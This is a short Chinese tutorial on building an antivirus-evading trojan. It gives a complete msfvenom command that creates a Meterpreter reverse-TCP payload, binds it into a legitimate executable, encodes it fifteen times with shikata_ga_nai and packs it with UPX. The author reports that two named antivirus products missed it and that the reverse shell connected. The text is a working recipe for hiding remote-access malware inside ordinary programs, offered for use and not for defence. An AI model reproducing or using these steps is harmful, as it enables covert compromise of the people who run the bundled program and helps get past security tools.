目录
木马的识别原理:
木马的扫描分为静态扫描和动态扫描,静态扫描是指杀软对木马与自己的病毒库进行比较判断是否为木马。动态扫描是对木马执行时的行为与病毒库的行为进行比较判断是否为木马。
免杀木马的制作过程:
首先我们要想绕过静态,最简单的方法就是直接用kali linux 中的msfvenom 进行编码多编几次就能过静态扫描了。我个人认为x86/shikata_ga_nai这个编码器挺好用的(但也得编码十几次)。最后在随便捆绑一个应用程序动静动能过。
msf的指令:msfvenom -p '合适的载荷' -x '捆绑程序名' -e x86/shikata_ga_nai -i '编码次数' lhost='kali ip' -f '合适的文件类型' -o '文件名'
例子:
msfvenom -p windows/meterpreter/reverse_tcp -x kunbangchengxu.exe -e x86/shikata_ga_nai -i 15 lhost= 192.168.1.2 -f exe -o muma.exe
运行之后生成木马。用upx加壳
upx muma.exe
动态静态扫描测试:
用*60查杀,未发现木马病毒
用火*查杀
开启监听
运行木马之后完成连接(*60,火*未提示木马)
总结:
木马免杀需要对木马进行多次编译,并对一个拥有数字签名的程序进行捆绑。可以绕过*60(其他的软件没试过)
但由于各种病毒库一直在刷新所以说不定几天后就不免杀了,但方法一样。